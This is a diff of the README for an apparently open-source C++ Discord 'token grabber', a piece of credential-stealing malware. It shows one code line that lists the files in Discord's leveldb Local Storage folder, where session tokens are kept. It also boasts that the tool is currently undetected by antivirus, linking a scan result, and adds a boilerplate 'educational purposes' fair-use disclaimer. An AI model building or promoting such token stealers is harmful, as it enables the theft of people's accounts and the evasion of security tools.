bdesvc/token-grabber/README.md

 auto files = split(exec("cd %appdata%/discord/Local Storage/leveldb && dir /n /b *"), "\n");
 ```

+# Usage
+This is illegal to use and is only a proof of concept since i haven't seen a C++ token grabber.
+I do not condone use or distribution of it!

 # Detection
 Since it's fresh and not copied it is currently undetected

 ![Detection](https://antiscan.me/images/result/huIT9opQ9Off.png)

+# Educational Purposes

+Copyright Disclaimer Under Section 107 of the Copyright Act 1976,
+allowance is made for"fair use" for purposes such as criticism, comment,news reporting,teaching scholarship, and research.
+Fair use is a use permitted by copyright statute that might otherwise be infringing.
+Non-profit, educational or personal use tips the balance in favor of fair use."